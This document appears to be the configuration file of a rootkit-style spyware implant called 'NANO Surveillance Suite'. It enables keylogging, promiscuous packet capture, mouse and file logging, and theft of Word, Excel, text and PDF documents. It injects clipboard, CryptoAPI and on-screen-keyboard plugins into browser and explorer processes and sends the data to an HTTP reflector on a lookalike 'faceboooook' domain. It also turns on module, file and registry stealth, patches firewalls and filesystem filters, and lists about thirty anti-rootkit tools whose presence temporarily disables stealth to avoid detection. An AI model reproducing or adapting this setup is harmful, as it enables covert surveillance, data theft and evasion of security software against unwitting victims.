; NANO Surveillance Suite configuration file

; encryption key
CRYPTOKEY=EAF74DC0D8B866485085CD6B528A3104EAF74DC0D8B866485085CD6B528A3104

; activation hash (256 bit)
ACTIVATIONHASH=FA9E3B5DAAEE212A9E39DA7CB1EDC8C0

; max cache size (mb)
MAXCACHESIZE=100

; cyclecache (0=no,1=reuse cache when maxsize exceeded)
CYCLECACHE=1

; max number of events before flush to disk (max 1500)
MAXEVTS=200

; max number of packets before flush to disk (max 1500)
MAXPACKETS=100

; shutdown delay (seconds)
SHUTDOWN_DELAY=60

; log keyboard (0=off/1=on)
LOGKBD=1

; log tcp/ip (0=off/1=on)
LOGTCP=1

; log filesystem (0=off/1=on)
LOGFS=1

; log mouse (0=off/1=on)
LOGMOUSE=1

; log packets (0=off/1=on/2=on,promiscuos)
LOGPACKETS=2

; send incomplete messages priority(0=off/1=on)
INCOMPLETEPRIORITY=1

; send messages priority (0=none,1=evt,2=data)
PRIORITY=2

; communication window (seconds)
COMMWINDOWINTERVAL=5

; incoming messages check delay (seconds)
MSGCHECKINTERVAL=600

; send messages interval (seconds)
SENDMSGINTERVAL=1

; kernelsockets default timeout (seconds)
SOCKTIMEOUT=60

; sendmessages chunksize (kbytes)
CHUNKSIZE=30

; sysinfo send interval (0=onrequest|seconds)
SYSINFOINTERVAL=0

; if not enabled, communicate from a thread injected into default browser <0|1>
PATCHFIREWALLS=1

; use module/fs/registry stealth (0=off/1=on)
USESTEALTH=1

; server failures (total) before getting failsafe configuration (0=off|numberoffailures)
REFLECTORS_MAXFAILURES=0

; url to get failsafe configuration from, in case of failures (ignored if REFLECTORS_MAXFAILURES = 0) (ip/host;port;hostname;path)
FAILSAFECFG_URL=192.168.0.11;80;null.net;/null.cfg

; communication default method : 0 = email, 1 = http, 2 = cycle(use both depending on failures))
COMM_METHOD=1

; smtp data reflector (where rk send messages to) (numericip|hostname;port;destemail)
;SMTP_DATA_REFLECTOR=1.1.1.1;25;pippo@pippo.com

; pop3 cmd reflector (where rk get messages from) (numericip|hostname;port;srcemail;password)
;POP3_CMD_REFLECTOR=1.1.1.1;110;pippo@pippo.com;pippo

; http reflector (numericip|hostname;port;hostname|numericip/path)
HTTP_REFLECTOR=192.168.15.10;80;www.faceboooook.com/nxptest

; tcp rules : port;direction(0=in,1=out,2=all);kbytesize(size|0=nolog|-1=all)
RULETCP=25;0;0
RULETCP=110;2;0
RULETCP=21;2;20
RULETCP=23;2;20
RULETCP=1863;2;-1

; ifs rules : process(*|substring);mask(*|substring);kbytesize(size|0=nolog|-1=all)
RULEFS=winword;doc;-1
RULEFS=winword;rtf;-1
RULEFS=notepad;txt;-1
RULEFS=wordpad;rtf;-1
RULEFS=excel;xls;-1
RULEFS=uedit32;txt;-1
RULEFS=acro;pdf;-1

; use rules for http tcp logging (0=off/1=on)
HTTPCHECKRULES=1

; http rules : substring (ignored if HTTPCHECKRULES = 0)
;RULEHTTP=/cgi-bin/getmsg
;RULEHTTP=/cgi-bin/HoTMaiL

; packet : port;direction(0=in,1=out,2=all);proto(name|*);kbytesize(size|0=nolog|-1=all)
;RULEPACKET=110;1;TCP;0
RULEPACKET=80;2;TCP;0

; disable stealth and communication features when these process are active (substring). 
; if @x is specified, stealth and communication is disabled for x minutes indipendently if the program is closed or not 
; if !x is specified, same as above but communications are permitted
;
; currently supported antirootkits:
;
; Rootkit Unhooker									ok (cfg rule handled by automatic "processname hexstring" detector)
; Rootkit Revealer		  							ok (cfg=rootkit)
; F-Secure Blacklight  								ok (cfg=blbeta@5)
; DarkSpy v1.05  									ok (cfg=darkspy,disables debugger (use dbgview), module/file/reg viewer)
; IceSword v1.20  					 				ok (cfg=iceswo,disables debugger (use dbgview), module/file/reg viewer)
; GMER v1.012  										ok (cfg=gmer, module viewer)
; Helios v1.1a  									ok (cfg=helios, module viewer)
; SVV v2.3  										ok (cfg=svv)
; McAfee Rootkit Detective  						ok (cfg=detect)
; Sophos AntiRootkit  								ok (cfg=sarcli)
; 													   (cfg=sargui)
; TrendMicro RootkitBuster  						ok (cfg=rootkit)
; AVG AntiRootkit  									ok (cfg=rootkit)
; AVZ antiviral toolkit v4.23						ok (cfg=avz,module/file/reg viewer)
; BitDefender Rootkit Uncover  						ok (cfg=bdrun)
; Panda AntiRootkit(Tucan)  						ok (cfg=pavark)
; modGreeper v0.3  									ok (module viewer)
; flister  											ok (auto)
; UnHackMe  										ok (cfg=hackme.ex!2)
; SEEM v4.x  										ok (cfg=seem,module/reg viewer)
; SafetyCheck v1.5.x  								crashes machine itself (cfg=safety,anyway....)
; HiddenFinder v1.301  								ok (module viewer)
; RkDetector v0.6  									ok (cfg=rkdet,registry viewer)
; Rootkit Hooks Analyzer							ok (cfg=hookanalyz)
; Archon scanner									ok (cfg=archon)
; Rootkitshark										ok (cfg=rks)
; Winshark											ok (cfg=nshark@5)
; Trojan Remover									ok (cfg=trjsc)
; 													   (cfg=rmvtrj@2)
; Knlsc												ok (cfg=knlsc)
; Find Hidden Services (fhs)						ok (cfg=fhs)
; Kill Hidden Services (khs)						ok (cfg=khs)
; SdtRestore										ok (cfg=sdt)

RULENOSTEALTH=rootkit
RULENOSTEALTH=blbeta@5
RULENOSTEALTH=hookanalyz
RULENOSTEALTH=knlsc
RULENOSTEALTH=hackme.ex!2
RULENOSTEALTH=fhs
RULENOSTEALTH=khs
RULENOSTEALTH=rks
RULENOSTEALTH=svv
RULENOSTEALTH=trjsc
RULENOSTEALTH=rmvtrj@2
RULENOSTEALTH=iceswo
RULENOSTEALTH=rkdet
RULENOSTEALTH=sdt
RULENOSTEALTH=viceconsol
RULENOSTEALTH=rcc.exe
RULENOSTEALTH=fsavgui
RULENOSTEALTH=helios
RULENOSTEALTH=darkspy
RULENOSTEALTH=gmer
RULENOSTEALTH=detect
RULENOSTEALTH=pavark
RULENOSTEALTH=bdrun
RULENOSTEALTH=safety
RULENOSTEALTH=nshark@5
RULENOSTEALTH=archon
RULENOSTEALTH=sarcli
RULENOSTEALTH=sargui
RULENOSTEALTH=seem
RULENOSTEALTH=avz

; patch filesystem filters (substring from DriverObject->DriverName)
RULEFSFILTERPATCH=\filemon
RULEFSFILTERPATCH=\fspy
RULEFSFILTERPATCH=\alfafm

;PLUGIN section (pluginname;injectinto;params)

; clipboard (params : 0(logtext)|1(logall))
PLUGRULE=plgnaclp.dll;notepad;0
PLUGRULE=plgnaclp.dll;word;0

; cryptoapi plugin
PLUGRULE=plgcrapi.dll;iexplore
;PLUGRULE=plgcrapi.dll;msimn
;PLUGRULE=plgcrapi.dll;msn
;PLUGRULE=plgcrapi.dll;outlook

; osk plugin
PLUGRULE=plgnaosk.dll;explorer.exe
;PLUGRULE=plgnaosk.dll;osk




